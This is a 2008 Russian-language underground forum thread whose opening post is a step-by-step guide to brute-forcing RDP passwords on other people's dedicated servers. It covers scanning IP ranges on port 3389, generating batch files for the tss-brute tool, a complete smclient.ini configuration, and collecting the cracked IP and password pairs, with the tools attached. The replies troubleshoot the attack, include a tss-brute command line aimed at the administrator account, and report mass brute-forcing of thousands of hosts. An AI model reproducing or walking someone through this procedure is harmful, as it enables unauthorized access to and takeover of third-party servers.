ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Underground > Информационная безопасность

Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;)

 
 
Опции темы Рейтинг: Рейтинг темы: голосов - 9, средняя оценка - 3.11.
Старый 07.08.2008, 00:54   #1
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию Брут дедиков [by Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??
1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.


Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг
Код:
[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1
и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:
1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270



ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ




VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.
Вложения
Тип файла: rar rankor.rar (186.1 Кб, 2985 просмотров)
Тип файла: rar www.rar (894 байт, 2469 просмотров)
Тип файла: rar VNC_Bypauth.rar (5.8 Кб, 2118 просмотров)
Тип файла: rar tss-brute.rar (86.8 Кб, 2676 просмотров)
Тип файла: rar RDP_client 5.1.rar (397.9 Кб, 2501 просмотров)

Последний раз редактировалось Capcha; 17.05.2009 в 00:57.
Capcha вне форума  
Плюсанули Capcha — 2 :
Старый 09.08.2008, 16:00   #101
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

А гденить можно указать таймаут на подключение к РДП, чтобы автоматом скидывало, если застопориться?
Andrew777 вне форума  
Старый 09.08.2008, 16:11   #102
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

smclient.ini
;timeout=120

Убери ; и поставь время в секундах.
Capcha вне форума  
Старый 09.08.2008, 17:08   #103
Участник
 
Аватар для Kernel32
 
Регистрация: 06.08.2008
Сообщений: 24

Репутация: 2
По умолчанию

А у меня снова не все как улюдей :)
Миниатюры
Нажмите на изображение для увеличения
Название: Безымянный.JPG
Просмотров: 407
Размер:	21.0 Кб
ID:	9651  
Kernel32 вне форума  
Старый 09.08.2008, 17:13   #104
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Kernel32, Закрыт порт 3389 на компе к кторому ты коннектишся.
Capcha вне форума  
Старый 09.08.2008, 18:30   #105
Участник
 
Аватар для Regger
 
Регистрация: 26.06.2008
Сообщений: 194

ICQ: 408888411

Репутация: 132
По умолчанию

качаю ремоут дестектор 5.2 , в систем 32 ставлю рид онли на файл mstsc.exe затем врубаю инсталятор и все равно ставиццо ремоут 6.0
__________________
Судя по тому, что нам отдали Олимпиаду в Сочи 2014 и Чемпионат мира 2018, видать там уверены, что Конец Света в 2012 неизбежен.
Regger вне форума  
Старый 09.08.2008, 18:34   #106
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Regger, не так. установи сначало а потом поставь ридонли на все ддлки и на экзешник.
Capcha вне форума  
Старый 09.08.2008, 18:35   #107
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

Regger, в безопасном режиме попробуй заменять.
Andrew777 вне форума  
Старый 09.08.2008, 18:36   #108
Участник
 
Регистрация: 08.08.2008
Сообщений: 6

ICQ: 470178

Репутация: 1
Отправить сообщение для sturmgewer с помощью Skype™
По умолчанию

не помогает, я уже как только не пробовал, екзешник нормально ставится,а длл-ка меняет версию при любом раскладе =\

зато если установить его в програмные файлы, то все ок работает
sturmgewer вне форума  
Старый 09.08.2008, 18:40   #109
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

sturmgewer, Отруби обновление винды
Capcha вне форума  
Старый 09.08.2008, 19:49   #110
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

ТЕМА!!!, Стучи в асю.
З.Ы. Всё там.
Capcha вне форума  
Старый 09.08.2008, 20:16   #111
Участник
 
Регистрация: 04.07.2008
Сообщений: 164

Репутация: 123
По умолчанию

Цитата:
Сообщение от Capcha Посмотреть сообщение
Kernel32, Закрыт порт 3389 на компе к кторому ты коннектишся.
не факт, возможно комп в ауте
SVErY вне форума  
Старый 09.08.2008, 20:18   #112
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

SVErY, Был бы timeout
Capcha вне форума  
Старый 09.08.2008, 23:56   #113
Участник
 
Аватар для Regger
 
Регистрация: 26.06.2008
Сообщений: 194

ICQ: 408888411

Репутация: 132
По умолчанию

народ плиз киньте mstscax.dll 6ой версии а то у мя 5 тая не встает сразу заменяетцо 6ой а 6 терь не работает из-за токо что mstscax.dll другая
__________________
Судя по тому, что нам отдали Олимпиаду в Сочи 2014 и Чемпионат мира 2018, видать там уверены, что Конец Света в 2012 неизбежен.
Regger вне форума  
Старый 10.08.2008, 07:59   #114
Участник
 
Регистрация: 05.08.2008
Сообщений: 192

Репутация: 581
По умолчанию

мЛЯть! ~3600 Дедов брутил четыре дня с помощью services.exe... Два дня батником ~1000 Дедов.... неодин непопалсо, диапазоны не с Асечки тобишь свои.
Capcha какая твоя статистика по бруту дедов?
__________________
«Мерило твоего Бога, - есть мерило твоего разума».
Эта сущность есть, собственно говоря, совесть, ибо она говорит человеку, чем он должен быть, указывает ему, что он не таков.
dimon878 вне форума  
Старый 10.08.2008, 19:02   #115
Участник
 
Аватар для bim7794
 
Регистрация: 22.06.2008
Сообщений: 47

Репутация: -2
По умолчанию

Люди вот у меня такои вопрос-
Я скрипт поставил к себе на саит! Вроде все сделал как по видео нажимаю поехали а он место списка дает мне !
<br />
<b>Warning</b>: file(7628) [<a href='function.file'>function. file</a>]: failed to open stream: No such file or directory in <
"D:\1\captcha\tss-brute.exe" -w "D:\1\captcha\pass.txt" -u administrator >>logs/.txt

Добавлено через 1 час 7 минут
НУ кто нить помогите! Скажите что надо сделать??

Последний раз редактировалось bim7794; 10.08.2008 в 20:10. Причина: Добавлено сообщение
bim7794 вне форума  
Старый 10.08.2008, 20:30   #116
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

Цитата:
Сообщение от bim7794 Посмотреть сообщение
Люди вот у меня такои вопрос-
Я скрипт поставил к себе на саит! Вроде все сделал как по видео нажимаю поехали а он место списка дает мне !
<br />
<b>Warning</b>: file(7628) [<a href='function.file'>function. file</a>]: failed to open stream: No such file or directory in <
"D:\1\captcha\tss-brute.exe" -w "D:\1\captcha\pass.txt" -u administrator >>logs/.txt

Добавлено через 1 час 7 минут
НУ кто нить помогите! Скажите что надо сделать??
Грит какойто файл отсутсвтует в директории брута. Папку Logs создал?
Andrew777 вне форума  
Старый 10.08.2008, 21:20   #117
Участник
 
Аватар для bim7794
 
Регистрация: 22.06.2008
Сообщений: 47

Репутация: -2
По умолчанию

люди проблема такова((( НЕ перебирает пароли а язык по умолчанию англискии стоит(((Что еще надо сделать??
Ну ответте плиз! надо очень!!

Последний раз редактировалось bim7794; 10.08.2008 в 21:53.
bim7794 вне форума  
Старый 10.08.2008, 21:56   #118
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

Цитата:
Сообщение от bim7794 Посмотреть сообщение
НЕ перебирает пароли а язык по умолчанию англискии стоит
где у тебя на компе иди на дедиках?=)
__________________
купить номер icq
...vamp вне форума  
Старый 10.08.2008, 21:57   #119
Участник
 
Аватар для bim7794
 
Регистрация: 22.06.2008
Сообщений: 47

Репутация: -2
По умолчанию

на компе))) Язык англискии ставил по умолчанию)) все равно((( не хочет((
В чем еще может быть причина??
bim7794 вне форума  
Старый 10.08.2008, 23:03   #120
Участник
 
Аватар для bim7794
 
Регистрация: 22.06.2008
Сообщений: 47

Репутация: -2
По умолчанию

подскажите! что сделать если не идет перебор паролеи?? Пожалуиста очень надо! Если ко о поможет то дам овзнагрождение небольшое))) ЗА етим в асю) А так кто нить скажите почему не перебирает пассы??
bim7794 вне форума  
Старый 10.08.2008, 23:09   #121
Участник
 
Регистрация: 29.04.2008
Сообщений: 50

Репутация: -22
По умолчанию

Цитата:
Сообщение от bim7794 Посмотреть сообщение
подскажите! что сделать если не идет перебор паролеи?? Пожалуиста очень надо! Если ко о поможет то дам овзнагрождение небольшое))) ЗА етим в асю) А так кто нить скажите почему не перебирает пассы??
может потому что их нету?

Добавлено через 27 минут

что делаю не так?

Последний раз редактировалось ТЕМА!!!; 10.08.2008 в 23:36. Причина: Добавлено сообщение
ТЕМА!!! вне форума  
Старый 10.08.2008, 23:37   #122
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

bim7794, RDP клиент старой версии поставил? Если нет - ставь. Ссылки уже давались, нужно скачать тут, а 5.1 (или 5.0 там) версию необходимо их положить в каталог C:\Windows\system32 и установить им свойства "Read Only"

Добавлено через 1 минуту
ТЕМА!!!, Ничего особенного, просто данный хост глючит с этим скриптом. Поставь на другой хост. Или воспользуйся моим: http://nemezzgr.phpnet.us/

Последний раз редактировалось NemeZz; 10.08.2008 в 23:38. Причина: Добавлено сообщение
NemeZz вне форума  
Старый 10.08.2008, 23:44   #123
Участник
 
Регистрация: 29.04.2008
Сообщений: 50

Репутация: -22
По умолчанию

NemeZz спасибо огромное,щас всё норм запахало...

Последний раз редактировалось ТЕМА!!!; 11.08.2008 в 00:16. Причина: Добавлено сообщение
ТЕМА!!! вне форума  
Старый 11.08.2008, 00:17   #124
Участник
 
Аватар для bim7794
 
Регистрация: 22.06.2008
Сообщений: 47

Репутация: -2
По умолчанию

NemeZz спасибо не мог бы поподробнеи??
bim7794 вне форума  
Старый 11.08.2008, 00:31   #125
Участник
 
Регистрация: 29.04.2008
Сообщений: 50

Репутация: -22
По умолчанию

bim7794 только что у меня была такая же проблема нужно сделать так ; скачиваешь RDP клиент с ссылки которую дал NemeZz ,распаковываешь архив там будет лежать две папки 6.0 и 5.0 заходишь в 5.0 оттуда копируешь два файла в C:\WINDOWS\system32 ,потом выйдет сообщение заменить делаешь ДА.думаю понятно объяснил.
ТЕМА!!! вне форума  
 

Метки
brute, dedicated server

Опции темы
Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 06:30.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи Коротко обо всем